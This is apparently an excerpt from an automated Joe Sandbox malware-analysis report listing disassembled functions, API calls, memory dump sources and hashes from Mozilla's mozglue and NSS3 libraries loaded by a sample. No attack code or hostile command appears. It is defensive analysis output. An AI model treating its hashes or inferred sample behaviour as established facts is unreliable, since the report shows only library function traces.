                                                                                                                                                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C798273), ref: 6C799D65
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(6C798273,?), ref: 6C799D7C
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?), ref: 6C799D92
                                                                                                                                                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C799E0F
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(6C79946B,?,?), ref: 6C799E24
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?), ref: 6C799E3A
                                                                                                                                                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C799EC8
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(6C79946B,?,?,?), ref: 6C799EDF
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,?), ref: 6C799EF5
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 956590011-0
                                                                                                                                                                                                                                                                                        • Opcode ID: b638d0a00c5cf8cbeb7dbac3baa6c4e024444677eaf7692f78d2674cb2b39943
                                                                                                                                                                                                                                                                                        • Instruction ID: 4831c9049824214f29a899658051dd5cbca701a83ccde165b93ba4914d54dda6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b638d0a00c5cf8cbeb7dbac3baa6c4e024444677eaf7692f78d2674cb2b39943
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 52718D71909B418FD712CF19D68055AF3F8FFA9315B448629EC5E5BB12EB30E885CB81
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C862C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PORT_ZAlloc_Util.NSS3(00D5E52E), ref: 6C862C5D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C0D30: calloc.MOZGLUE ref: 6C8C0D50
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C0D30: TlsGetValue.KERNEL32 ref: 6C8C0D6D
                                                                                                                                                                                                                                                                                        • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C862C8D
                                                                                                                                                                                                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C862CE0
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C862E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C862CDA,?,00000000), ref: 6C862E1E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C862E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C862E33
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C862E00: TlsGetValue.KERNEL32 ref: 6C862E4E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C862E00: EnterCriticalSection.KERNEL32(?), ref: 6C862E5E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C862E00: PL_HashTableLookup.NSS3(?), ref: 6C862E71
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C862E00: PL_HashTableRemove.NSS3(?), ref: 6C862E84
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C862E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C862E96
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C862E00: PR_Unlock.NSS3 ref: 6C862EA9
                                                                                                                                                                                                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C862D23
                                                                                                                                                                                                                                                                                        • CERT_IsCACert.NSS3(00000001,00000000), ref: 6C862D30
                                                                                                                                                                                                                                                                                        • CERT_MakeCANickname.NSS3(00000001), ref: 6C862D3F
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C862D73
                                                                                                                                                                                                                                                                                        • CERT_DestroyCertificate.NSS3(?), ref: 6C862DB8
                                                                                                                                                                                                                                                                                        • free.MOZGLUE ref: 6C862DC8
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C863E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C863EC2
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C863E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C863ED6
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C863E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C863EEE
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C863E60: PR_CallOnce.NSS3(6C9C2AA4,6C8C12D0), ref: 6C863F02
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C863E60: PL_FreeArenaPool.NSS3 ref: 6C863F14
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C863E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C863F27
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3941837925-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 6bb622882a99266be16a5a7222027c69d047fb67d3a4ff34560bb469587a96e5
                                                                                                                                                                                                                                                                                        • Instruction ID: f4b6479e4fc0eeec46dd67fa8f886e4c73a0f398dfe7f74936c54a4ea70466e7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6bb622882a99266be16a5a7222027c69d047fb67d3a4ff34560bb469587a96e5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F1512F71A042199BEB21CF2ACE88B5B77E5EF84349F140C7CEC4593A50EB35E814CB92
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C79DDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,00000000,?,6C78DEFD), ref: 6C79DDCF
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77FA00: ReleaseSRWLockExclusive.KERNEL32(?,?,6C755407), ref: 6C77FA4B
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7990E0: free.MOZGLUE(00000000,00000000,00000000,?,6C79B6F6,?,?,?,?,?,6C79B127), ref: 6C7990FF
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7990E0: free.MOZGLUE(?,00000000,00000000,?,6C79B6F6,?,?,?,?,?,6C79B127), ref: 6C799108
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,00000000,?,6C78DEFD), ref: 6C79DE0D
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000,?,?,00000000,00000000,?,6C78DEFD), ref: 6C79DE41
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,00000000,?,6C78DEFD), ref: 6C79DE5F
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,00000000,?,6C78DEFD), ref: 6C79DEA3
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,00000000,?,6C78DEFD), ref: 6C79DEE9
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C78DEFD), ref: 6C79DF32
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C79DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?,?,00000000,?,?,?,6C79DF7F,?,?,00000000,00000000,?,6C78DEFD), ref: 6C79DB86
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C79DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?,?,?,?,00000000,?,?,?,6C79DF7F,?,?,00000000,00000000), ref: 6C79DC0E
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C78DEFD), ref: 6C79DF65
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,00000000,00000000,?,6C78DEFD), ref: 6C79DF80
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C765E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C765EDB
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C765E90: memset.VCRUNTIME140(ewzl,000000E5,?), ref: 6C765F27
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C765E90: LeaveCriticalSection.KERNEL32(?), ref: 6C765FB2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 112305417-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 87f143f8e32eac4fb45f513c3d6a07b68ddbf04af3f8a8d700a45e7392625955
                                                                                                                                                                                                                                                                                        • Instruction ID: ed9141c2c7e162911b2dd42bde3a66991eabb09b844f8533cf5896b30a9be442
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 87f143f8e32eac4fb45f513c3d6a07b68ddbf04af3f8a8d700a45e7392625955
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9551D6766016019FD711CB29EA846AEB37BBFA1308F95012CD81A53F01D731F95ACB9A
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C7A5D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C7A5C8C,?,6C77E829), ref: 6C7A5D32
                                                                                                                                                                                                                                                                                        • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C7A5C8C,?,6C77E829), ref: 6C7A5D62
                                                                                                                                                                                                                                                                                        • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C7A5C8C,?,6C77E829), ref: 6C7A5D6D
                                                                                                                                                                                                                                                                                        • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C7A5C8C,?,6C77E829), ref: 6C7A5D84
                                                                                                                                                                                                                                                                                        • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C7A5C8C,?,6C77E829), ref: 6C7A5DA4
                                                                                                                                                                                                                                                                                        • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C7A5C8C,?,6C77E829), ref: 6C7A5DC9
                                                                                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 6C7A5DDB
                                                                                                                                                                                                                                                                                        • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C7A5C8C,?,6C77E829), ref: 6C7A5E00
                                                                                                                                                                                                                                                                                        • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C7A5C8C,?,6C77E829), ref: 6C7A5E45
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2325513730-0
                                                                                                                                                                                                                                                                                        • Opcode ID: a065b7c638c4004862ce508c693bc31e2e633b3d0fb64a6735e2d64308a4c183
                                                                                                                                                                                                                                                                                        • Instruction ID: 646c1d7b17228bb6ef893003cad81d0f4e8febc4e7abec07eee8d7f6f38bc50d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a065b7c638c4004862ce508c693bc31e2e633b3d0fb64a6735e2d64308a4c183
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 06417D707002059FCB10DFA5D9DDAAE77B9EF89318F144178E50AAB791EB30A906CB61
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C77CC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C7431A7), ref: 6C77CDDD
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                        • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                                                                                        • API String ID: 4275171209-2186867486
                                                                                                                                                                                                                                                                                        • Opcode ID: 0f6de346a69d492067a7119de0a4af0f2f8974255e76e994da1564ea5fce8672
                                                                                                                                                                                                                                                                                        • Instruction ID: d6b19969dc3f5dea7f7577580465282fb910af00abb2e2cc88beff8eb2a627c7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0f6de346a69d492067a7119de0a4af0f2f8974255e76e994da1564ea5fce8672
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3731A53174120E5FFF20AE658E45B6E7B79AB49715F304035F610ABB80DBB0E50087B1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C74ECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C74F100: LoadLibraryW.KERNEL32(shell32,?,6C7BD020), ref: 6C74F122
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C74F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C74F132
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000012), ref: 6C74ED50
                                                                                                                                                                                                                                                                                        • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C74EDAC
                                                                                                                                                                                                                                                                                        • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C74EDCC
                                                                                                                                                                                                                                                                                        • CreateFileW.KERNEL32 ref: 6C74EE08
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C74EE27
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C74EE32
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C74EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C74EBB5
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C74EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C77D7F3), ref: 6C74EBC3
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C74EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C77D7F3), ref: 6C74EBD6
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6C74EDC1
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                                                                                                                                                                                                                                        • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                                                                                                                                                                                                                                        • API String ID: 1980384892-344433685
                                                                                                                                                                                                                                                                                        • Opcode ID: a49eafc7957bc5b18886a6633252218ef3ba660cbdba2e4ffdf17e7d306ef83b
                                                                                                                                                                                                                                                                                        • Instruction ID: b1e25b6fac9c17c9f3259cebc4942f44823c76dbc6f2d20c4a7e92948fef5dfb
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a49eafc7957bc5b18886a6633252218ef3ba660cbdba2e4ffdf17e7d306ef83b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4C51C371D052188BEB00DF68CA497EEF7B4AF59328F44C52DE8556B740E7306948CBE2
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C7BA520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C7BA565
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7BA470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7BA4BE
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7BA470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C7BA4D6
                                                                                                                                                                                                                                                                                        • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C7BA65B
                                                                                                                                                                                                                                                                                        • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C7BA6B6
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
                                                                                                                                                                                                                                                                                        • String ID: 0$z
                                                                                                                                                                                                                                                                                        • API String ID: 310210123-2584888582
                                                                                                                                                                                                                                                                                        • Opcode ID: 210758d4d732f92b2ff17585851a13508c58e86caa5740b46a250de3e9db52ea
                                                                                                                                                                                                                                                                                        • Instruction ID: 94445fd055000fda6fb0d1b30f175622b3c33076b47644d5197319dcc0226d0f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 210758d4d732f92b2ff17585851a13508c58e86caa5740b46a250de3e9db52ea
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AF413A719087459FC341DF28C584A8BBBE5BF89358F408A2EF49997650E730E649CB93
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C89ACC0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C89ACE6
                                                                                                                                                                                                                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C89AD14
                                                                                                                                                                                                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C89AD23
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C97D930: PL_strncpyz.NSS3(?,?,?), ref: 6C97D963
                                                                                                                                                                                                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C89AD39
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: L_strncpyzPrint$L_strcatn
                                                                                                                                                                                                                                                                                        • String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
                                                                                                                                                                                                                                                                                        • API String ID: 332880674-3521875567
                                                                                                                                                                                                                                                                                        • Opcode ID: 78622b3db11fd2e590c4f6dbe3d7886469a52bc88116157166ffbad72ccbbbc9
